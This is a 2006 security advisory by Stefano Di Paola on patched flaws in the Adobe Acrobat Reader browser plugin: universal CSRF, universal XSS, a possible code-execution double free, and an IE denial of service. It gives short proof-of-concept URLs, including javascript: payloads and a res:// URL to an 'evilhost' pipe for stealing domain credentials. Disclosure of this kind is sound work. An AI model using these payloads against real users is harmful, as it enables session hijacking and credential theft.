SecurityReason - Adobe Acrobat Reader Plugin

Advisory Text :

Adobe Acrobat Reader Plugin - Multiple Vulnerabilities

Original Advisory:
http://www.wisec.it/vulns.php?page=9

Original Discovery and Research:
Stefano Di Paola

Contribution:
Giorgio Fedon (IE Dos, UXSS Analysis)
Elia Florio (Poc and Code Execution analysis)

Status: Vendor Informed on 15 October 2006
Patched: Yes

Please upgrade your current version of adobe acrobat

_______________________________________________________

Brief Intro:

During our lecture at 23C3 (Subverting Ajax), we presented
some interesting attack vectors to take advantage of
the dangerous vulnerability called "Prototype Hijacking"
in browser frameworks. Any XSS represents a good
entry point, and single Universal XSS is de facto the best
entry point.

Since Adobe did a great job and patched in less than 1
month the issues herein reported, we decided to
undisclose our findings during 23C3 to make the audience
better understand risks and impacts of high-level plugins
vulnerabilities (e.g. Func. Integration and not memory
corruption).

There is also a possible remote code execution (RCE), but
was not the focus of our talk.
Affected Versions:
Adobe Acrobat Reader plugin 7 (fully patched) and Below

Tested On:
Firefox 1.5.0.7 and Below, 2.0RC2 under Windows XP SP2
Firefox 1.5.0.7 and Below, 2.0RC2 under Ubuntu 6.06
Internet Explorer SP2 under Windows XP SP2

Summary:

Adobe Acrobat plugin for Mozilla Firefox (acroreader) is able to
populate Portable Documents
(PDF files) forms by supplying an external set of datas through the FDF,
XML, or XFDF fields.
Implementation of FDF, XML, XFDF
(http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters
.pdf)
functionalities in Acrobat Reader Plugin is vulnerable to different kind
of attacks.
Vulnerability extent changes from browser to browser:

1. Universal CSRF / session riding;
(Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)

2. UXSS in #FDF, #XML e #XFDF;
(Mozilla Firefox + Acrobat Reader plugin)

3. Possible Remote Code Execution;
(Mozilla Firefox + Acrobat Reader plugin)

4. Denial of Service;
(Internet Explorer + Acrobat Reader plugin)

______________________________________

1. Universal CSRF and session riding

This is probably Adobe related as all tested browsers (IE,Firefox,Opera)
where affected.
The issue is that by creating a special link like this:

http://site.com/file.pdf#FDF=http://victim.com/index.html?param=...

automatically Adobe plugin sends a request to 'victim.com' without user
interaction asking
for defined page in 'fdf' parameter. This could be used as a Universal
Session Riding (aka UCSRF)
attack which is a well known vulnerability.
Note that the same effect is accomplished by using 'xml' and 'xfdf'
parameters.

=====

2. UXSS in #FDF, #XML e #XFDF

In addition by using the following request, is possible to execute
javascript code
inside Firefox browser:

http://site.com/file.pdf#FDF=javascript:alert('Test Alert')

The previous could be triggered against a site and because of this is a
Universal Cross Site
Scripting.
UXSS is a particular type of Cross Site Scripting and has the ability to
be triggered
by exploiting flaws inside browsers, instead of leveraging the
vulnerabilities against
insecure web sites. It's also possible to force clients to download
files by supplying:

http://site.com/file.pdf#FDF=javascript:document.location=
'file://C:/winnt/notepad.exe'

<Alternative_Attack>

Alternative Attack using NamedPipes
- http://www.514.es/2006/10/exploiting_win32_design_flaws.html

In order to steal Domain credentials with explorer :

http://anyhost/file.pdf#fdf=res://\evilhostpipeapipe

and then by applying techniques found in 514.es paper we found
this kind of url and protocol (res://) could be used too.

This means that also Internet Explorer could be abused in conjunction
of
Adobe plugin to make attacks on internal LANs and get victims
credentials.

</Alternative_Attack>

3. Possible Remote Code Execution
There is also a possible Remote code Execution by leveraging a memory
corruption inside
Firefox by supplying the following request:

http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...');

It's possible to cause a DoubleFree() error and to overwrite part of the
Structural
Exception Handler.

Runtime vulnerability analisys
The problem seems to be caused by a "Double MSVCRT.free()" executed by
Acrobat plugin.
The routine which cause Firefox to crash is located in the following
call to NP_Shutdown().

Elia Florio is credited for Runtime analysis and exploitation.

NB. The POC of this vulnerability won't be released.

=====

4. Denial of Service (Internet Explorer only);

By supplying the following request via the web browser,
it's possible to cause a denial of service in Internet Explorer:

http://site.com/file.pdf#####...(More '#')

The application is waiting for more inputs and allocates more memory.

--
...oOOo...oOOo....
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..................